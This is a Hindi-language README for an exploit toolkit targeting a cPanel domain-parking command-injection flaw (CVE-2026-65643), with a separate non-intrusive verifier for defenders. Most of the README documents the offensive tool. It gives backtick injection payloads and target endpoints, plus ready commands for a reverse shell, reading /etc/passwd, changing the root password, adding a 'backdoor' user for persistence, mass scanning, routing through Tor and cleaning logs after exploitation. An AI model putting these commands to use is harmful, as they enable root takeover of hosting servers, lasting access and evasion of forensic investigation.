
रेड/ब्लू टीम टूलकिट CVE-2026-65643 के लिए, जो cPanel डोमेन पार्किंग RCE है। इसमें रिवर्स शेल, वेबशेल, पर्सिस्टेंस और मास स्कैनिंग के साथ एक्सप्लॉइट शामिल है, साथ ही डिटेक्शन और ऑडिटिंग के लिए एक गैर-आक्रामक वेरिफायर भी है।

⚠️ केवल नैतिक उपयोग – अधिकृत सुरक्षा परीक्षण यह रिपॉजिटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनिट्रेशन टेस्टर्स के लिए उपकरण प्रदान करती है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच CFAA (अमेरिका), कंप्यूटर मिसयूज़ एक्ट (यूके), TCK 243/244 (तुर्की), और दुनिया भर के समान कानूनों के तहत अवैध है।
CVE‑2026‑65643 cPanel और WHM संस्करण 11.x में एक गंभीर कमांड इंजेक्शन भेद्यता है जो एक प्रमाणित cPanel उपयोगकर्ता को डोमेन पार्किंग कार्यक्षमता के माध्यम से रूट विशेषाधिकारों के साथ मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।
`) का उपयोग करके शेल कमांड इंजेक्ट कर सकता है।| उपकरण | उद्देश्य | इच्छित उपयोगकर्ता |
|---|---|---|
exploit.py | रिवर्स शेल, वेबशेल, स्थिरता, फ़ाइल पढ़ना/लिखना, रूट पासवर्ड परिवर्तन, बड़े पैमाने पर स्कैनिंग, Tor समर्थन, और OPSEC सुविधाओं के साथ पूर्ण हथियारयुक्त टूलकिट। |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.py पैरामीटरverifier.py पैरामीटरशोषण निम्नलिखित cPanel एंडपॉइंट और इंजेक्शन विधियों का उपयोग करता है:
# इंजेक्शन पेलोड प्रारूप
test.com`<command>`
# उदाहरण
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
| रेड टीम / अधिकृत पेनटेस्टर |
verifier.py | गैर-आक्रामक भेद्यता जांचकर्ता जो cPanel संस्करण का पता लगाता है, इंजेक्शन को मान्य करता है, और बिना किसी दुर्भावनापूर्ण पेलोड को निष्पादित किए जोखिम का आकलन करता है। विस्तृत रिपोर्ट उत्पन्न करता है। | ब्लू टीम / सुरक्षा ऑडिटर |
| फीचर | exploit.py | verifier.py |
|---|
| भेद्यता का पता लगाना | ✅ | ✅ |
| संस्करण का पता लगाना (4 एंडपॉइंट) | ✅ | ✅ |
| कमांड इंजेक्शन | ✅ | ❌ |
| रिवर्स शेल | ✅ | ❌ |
| वेबशेल अपलोड | ✅ | ❌ |
| स्थिरता (cPanel उपयोगकर्ता निर्माण) | ✅ | ❌ |
| रूट पासवर्ड परिवर्तन | ✅ | ❌ |
| फ़ाइल पढ़ना/लिखना | ✅ | ❌ |
| 4 इंजेक्शन विधियाँ (JSON/Form/CGI/API2) | ✅ | ✅ |
| Tor समर्थन (गुमनामी) | ✅ | ❌ |
| User‑Agent रोटेशन (OPSEC) | ✅ | ❌ |
| जिटर (OPSEC) | ✅ | ❌ |
| बड़े पैमाने पर स्कैनिंग (मल्टी-थ्रेड) | ✅ | ❌ |
| इंटरैक्टिव शेल | ✅ | ❌ |
| गैर-आक्रामक (सुरक्षित) मोड | ❌ | ✅ |
| टाइमलाइन लॉगिंग | ✅ | ✅ |
| HTML रिपोर्ट | ✅ | ❌ |
| JSON रिपोर्ट | ✅ | ✅ |
| लॉग सफाई (एंटी-फोरेंसिक) | ✅ | ✅ |
| प्रॉक्सी समर्थन | ✅ | ✅ |
| कस्टम User‑Agent | ✅ | ✅ |
| SSL सत्यापन नियंत्रण | ✅ | ✅ |
| परिदृश्य | अनुशंसित उपकरण |
|---|
| ब्लू टीम – जाँच करना कि आपका cPanel इंस्टॉलेशन असुरक्षित है या नहीं | verifier.py |
| सुरक्षा ऑडिट – गैर-आक्रामक भेद्यता मूल्यांकन | verifier.py |
| रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनिट्रेशन परीक्षण | exploit.py |
| बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षण | verifier.py |
| बड़े पैमाने पर स्कैनिंग – कई लक्ष्यों की भेद्यता की जाँच | exploit.py (केवल पता लगाना) |
| घटना प्रतिक्रिया – जाँच करना कि सिस्टम समझौता किए गए हैं या नहीं | verifier.py |
| पैरामीटर | विवरण |
|---|
-t, --target | लक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083) |
-l, --target-file | बड़े पैमाने पर स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-u, --username | cPanel उपयोगकर्ता नाम |
-P, --password | cPanel पासवर्ड |
-p, --port | cPanel पोर्ट ओवरराइड करें (URL से डिफ़ॉल्ट या 2083) |
--threads | मल्टी-टारगेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10) |
-o, --output | JSON रिपोर्ट को फ़ाइल में सहेजें |
--html-report | HTML रिपोर्ट को फ़ाइल में सहेजें |
-v, --verbose | विस्तृत आउटपुट |
--proxy | HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080) |
--tor | Tor के माध्यम से रूट करें (localhost:9050) |
-ua, --user-agent | कस्टम User‑Agent |
--no-keep-alive | सत्र को सक्रिय न रखें |
--delay | अनुरोधों के बीच देरी (डिफ़ॉल्ट: 2.0s) |
--jitter | अनुरोधों के बीच यादृच्छिक जिटर (0‑1 सेकंड) (डिफ़ॉल्ट: 0.5) |
--max-retries | अधिकतम पुनः प्रयास (डिफ़ॉल्ट: 5) |
--ssl-verify | SSL प्रमाणपत्र सत्यापित करें |
--timeout | अनुरोध टाइमआउट (डिफ़ॉल्ट: 15s) |
--cmd | लक्ष्य पर एकल कमांड निष्पादित करें |
--reverse-shell | रिवर्स शेल IP:PORT |
--passwd | रूट पासवर्ड बदलें |
--adduser | cPanel उपयोगकर्ता बनाएं (USER DOMAIN PASSWORD) |
--read | फ़ाइल पढ़ें |
--write | फ़ाइल लिखें (पथ निर्दिष्ट करें) |
--write-content | लिखने के लिए सामग्री |
--cleanup | शोषण के बाद लॉग और इतिहास साफ़ करें |
-i, --interactive | शोषण के बाद इंटरैक्टिव शेल |
--domain-suffix | पार्क किए गए डोमेन के लिए सफ़िक्स (डिफ़ॉल्ट: exploit.local) |
| पैरामीटर | विवरण |
|---|
-t, --target | लक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083) |
-u, --username | cPanel उपयोगकर्ता नाम |
-P, --password | cPanel पासवर्ड |
-o, --output | JSON रिपोर्ट को फ़ाइल में सहेजें |
-v, --verbose | विस्तृत आउटपुट |
--proxy | HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080) |
--tor | Tor के माध्यम से रूट करें (localhost:9050) |
--ssl-verify | SSL प्रमाणपत्र सत्यापित करें |
--timeout | अनुरोध टाइमआउट (डिफ़ॉल्ट: 15s) |
--cleanup | परीक्षण के बाद लॉग साफ़ करें |
| # | परिदृश्य | कमांड |
|---|
| 1 | त्वरित भेद्यता जाँच | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | रिपोर्ट के साथ विस्तृत स्कैन | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | रिवर्स शेल | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | कमांड निष्पादित करें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | संवेदनशील फ़ाइल पढ़ें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | रूट पासवर्ड बदलें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | नया cPanel उपयोगकर्ता बनाएं (स्थिरता) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | शोषण के बाद इंटरैक्टिव शेल | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | फ़ाइल से बड़े पैमाने पर स्कैनिंग | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | प्रॉक्सी, Tor, और कस्टम User‑Agent का उपयोग करें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | शोषण के बाद लॉग साफ़ करें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| विधि | एंडपॉइंट | विवरण |
|---|
| JSON API | /cpsessXXXXX/json-api/domain | JSON पेलोड के माध्यम से प्राथमिक इंजेक्शन विधि |
| फ़ॉर्म डेटा | /cpsessXXXXX/json-api/domain | फ़ॉर्म-एन्कोडेड डेटा के माध्यम से वैकल्पिक इंजेक्शन |
| CGI स्क्रिप्ट | /cgi-sys/domainpark.cgi | लीगेसी CGI एंडपॉइंट इंजेक्शन |
| API2 | /cpsessXXXXX/json-api/cpanel | लीगेसी API2 इंजेक्शन विधि |